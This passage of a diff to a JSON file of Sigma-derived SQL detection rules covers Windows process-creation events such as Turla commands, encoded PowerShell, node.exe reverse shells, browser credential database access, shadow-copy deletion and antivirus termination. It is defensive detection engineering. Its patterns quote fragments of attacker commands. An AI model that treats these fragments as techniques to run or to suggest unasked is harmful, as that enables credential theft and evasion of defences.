'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%netsh %' ESCAPE '\\' AND CommandLine LIKE '%show %' ESCAPE '\\' AND CommandLine LIKE '%firewall %' ESCAPE '\\' AND (CommandLine LIKE '%config %' ESCAPE '\\' OR CommandLine LIKE '%state %' ESCAPE '\\' OR CommandLine LIKE '%rule %' ESCAPE '\\' OR CommandLine LIKE '%name=all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" + "filename": "proc_creation_win_netsh_fw_rules_discovery.yml" }, { - "title": "Turla Group Commands May 2020", - "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", - "status": "test", - "description": "Detects commands used by Turla group as reported by ESET in May 2020", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Script Execution From Temp Folder", + "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "status": "experimental", + "description": "Detects a suspicious script executions from temporary folder", + "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", "tags": [ - "attack.g0010", "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_apt_turla_comrat_may20.yml" - }, - { - "title": "Format.com FileSystem LOLBIN", - "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", - "status": "test", - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_format.yml" + "filename": "proc_creation_win_susp_script_exec_from_temp.yml" }, { - "title": "Suspicious PowerShell Encoded Command Patterns", - "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "title": "Potential Arbitrary Code Execution Via Node.EXE", + "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", "status": "experimental", - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Other tools that work with encoded scripts in the command line instead of script files" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" + "filename": "proc_creation_win_node_abuse.yml" }, { - "title": "Rundll32 Execution Without Parameters", - "id": "5bb68627-3198-40ca-b458-49f973db8752", - "status": "test", - "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "author": "Bartlomiej Czyz, Relativity", + "title": "Suspicious Execution of Systeminfo", + "id": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", + "status": "experimental", + "description": "Detects usage of the \"systeminfo\" command to retrieve information", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ - "False positives may occur if a user called rundll32 from CLI with no options" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine IN ('rundll32.exe', 'rundll32'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR OriginalFileName = 'sysinfo.exe'))" ], - "filename": "proc_creation_win_rundll32_without_parameters.yml" + "filename": "proc_creation_win_systeminfo_execution.yml" }, { - "title": "Phishing Pattern ISO in Archive", - "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "title": "SQLite Chromium Profile Data DB Access", + "id": "24c77512-782b-448a-8950-eddb0785fc71", "status": "experimental", - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", + "author": "TropChaud", "tags": [ - "attack.initial_access", - "attack.t1566" + "attack.credential_access", + "attack.t1539", + "attack.t1555.003", + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (Image LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR Image LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" + "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" }, { - "title": "Service StartupType Change Via PowerShell Set-Service", - "id": "62b20d44-1546-4e61-afce-8e175eb9473c", + "title": "PDQ Deploy Remote Adminstartion Tool Execution", + "id": "d679950c-abb7-43a6-80fb-2a480c4fc450", "status": "experimental", - "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of PDQ Deploy remote admin tool", + "author": "frack113", "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.t1562.001" + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ - "False positives may occur with troubleshooting scripts" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR OriginalFileName = 'PowerShell.EXE') AND (CommandLine LIKE '%Set-Service%' ESCAPE '\\' AND CommandLine LIKE '%-StartupType%' ESCAPE '\\' AND (CommandLine LIKE '%Disabled%' ESCAPE '\\' OR CommandLine LIKE '%Manual%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PDQ Deploy Console' OR Product = 'PDQ Deploy' OR Company = 'PDQ.com' OR OriginalFileName = 'PDQDeployConsole.exe'))" ], - "filename": "proc_creation_win_powershell_set_service_disabled.yml" + "filename": "proc_creation_win_pdqdeploy_execution.yml" }, { - "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "id": "75578840-9526-4b2a-9462-af469a45e767", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Whoami.EXE Execution From Privileged Process", + "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", "tags": [ - "attack.persistence", - "attack.t1136.001", - "cve.2021.35211" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'whoami.exe' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" + "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" }, { - "title": "HackTool - Hashcat Password Cracker Execution", - "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", + "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", "status": "test", - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "author": "frack113", + "description": "Detects new commands that add new printer port which point to suspicious file", + "author": "EagleEye Team, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1110.002" + "attack.persistence", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Tools that use similar command line flags and values" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_hashcat.yml" + "filename": "proc_creation_win_exploit_cve_2020_1048.yml" }, { - "title": "Suspicious Userinit Child Process", - "id": "b655a06a-31c0-477a-95c2-3726b83d649d", + "title": "Curl.EXE Execution With Custom UserAgent", + "id": "3286d37a-00fd-41c2-a624-a672dcd34e60", "status": "test", - "description": "Detects a suspicious child process of userinit", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", + "description": "Detects execution of curl.exe with custom useragent options", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1055" + "attack.command_and_control", + "attack.t1071.001" ], "falsepositives": [ - "Administrative scripts" + "Scripts created by developers and admins", + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%\\\\netlogon\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR OriginalFileName = 'explorer.exe')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_userinit_child.yml" + "filename": "proc_creation_win_curl_useragent.yml" }, { - "title": "Suspicious Execution of Shutdown", - "id": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "title": "Potential Maze Ransomware Activity", + "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", "status": "test", - "description": "Use of the commandline to shutdown or reboot windows", - "author": "frack113", + "description": "Detects specific process characteristics of Maze ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1047", "attack.impact", - "attack.t1529" + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND (CommandLine LIKE '%/r %' ESCAPE '\\' OR CommandLine LIKE '%/s %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND Image LIKE '%.tmp' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_shutdown_execution.yml" + "filename": "proc_creation_win_malware_maze_ransomware.yml" }, { - "title": "LSA PPL Protection Disabled Via Reg.EXE", - "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "title": "Process Memory Dump Via Dotnet-Dump", + "id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", "status": "experimental", - "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.010" + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dotnet-dump.exe' ESCAPE '\\' OR OriginalFileName = 'dotnet-dump.dll') AND CommandLine LIKE '%collect%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" + "filename": "proc_creation_win_lolbin_dotnet_dump.yml" }, { - "title": "Psexec Execution", - "id": "730fc21b-eaff-474b-ad23-90fd265d4988", - "status": "test", - "description": "Detects user accept agreement execution in psexec commandline", - "author": "omkar72", + "title": "Use of Mftrace.exe", + "id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", + "status": "experimental", + "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569", - "attack.t1021" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Administrative scripts." + "Legitimate use for tracing purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR OriginalFileName = 'psexec.c'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR OriginalFileName = 'mftrace.exe') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) OR ParentImage LIKE '%\\\\mftrace.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexec_execution.yml" + "filename": "proc_creation_win_lolbin_mftrace.yml" }, { - "title": "Potential Discovery Activity Via Dnscmd.EXE", - "id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", - "status": "experimental", - "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.", - "author": "@gott_cyber", + "title": "LockerGoga Ransomware Activity", + "id": "74db3488-fd28-480a-95aa-b7af626de068", + "status": "stable", + "description": "Detects LockerGoga ransomware activity via specific command line.", + "author": "Vasiliy Burov, oscd.community", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1543.003" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Legitimate administration use" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%/enumrecords%' ESCAPE '\\' OR CommandLine LIKE '%/enumzones%' ESCAPE '\\' OR CommandLine LIKE '%/ZonePrint%' ESCAPE '\\' OR CommandLine LIKE '%/info%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dnscmd_discovery.yml" + "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" }, { - "title": "Wab/Wabmig Unusual Parent Or Child Processes", - "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "title": "Kavremover Dropped Binary LOLBIN Usage", + "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", "status": "experimental", - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], "falsepositives": [ "Unknown" ], "level": "high", + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wab_unusual_parents.yml" + "filename": "proc_creation_win_lolbin_kavremover.yml" }, { - "title": "Gpresult Display Group Policy Information", - "id": "e56d3073-83ff-4021-90fe-c658e0709e72", + "title": "Add New Windows Capability - ProcCreation", + "id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", "status": "experimental", - "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", - "author": "frack113", + "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1615" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the capabilities by administartors or users. Filter accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\gpresult.exe' ESCAPE '\\' AND (CommandLine LIKE '%/z%' ESCAPE '\\' OR CommandLine LIKE '%/v%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-WindowsCapability%' ESCAPE '\\' AND CommandLine LIKE '%OpenSSH.%' ESCAPE '\\')" ], - "filename": "proc_creation_win_gpresult_execution.yml" + "filename": "proc_creation_win_powershell_add_windows_capability.yml" }, { - "title": "Remote Access Tool - NetSupport Execution From Unusual Location", - "id": "37e8d358-6408-4853-82f4-98333fca7014", + "title": "Use of FSharp Interpreters", + "id": "b96b2031-7c17-4473-afe7-a30ce714db29", "status": "experimental", - "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use by a software developer." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\client32.exe' ESCAPE '\\' OR Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=a9d50692e95b79723f3e76fcf70d023e%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsianycpu.exe' ESCAPE '\\' OR OriginalFileName = 'fsianycpu.exe' OR Image LIKE '%\\\\fsi.exe' ESCAPE '\\' OR OriginalFileName = 'fsi.exe'))" ], - "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" + "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml" }, { - "title": "Disable Windows IIS HTTP Logging", - "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "title": "Taskkill Symantec Endpoint Protection", + "id": "4a6713f6-3331-11ed-a261-0242ac120002", "status": "experimental", - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "author": "frack113", + "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_appcmd_http_logging.yml" + "filename": "proc_creation_win_taskkill_sep.yml" }, { - "title": "Potential LethalHTA Technique Execution", - 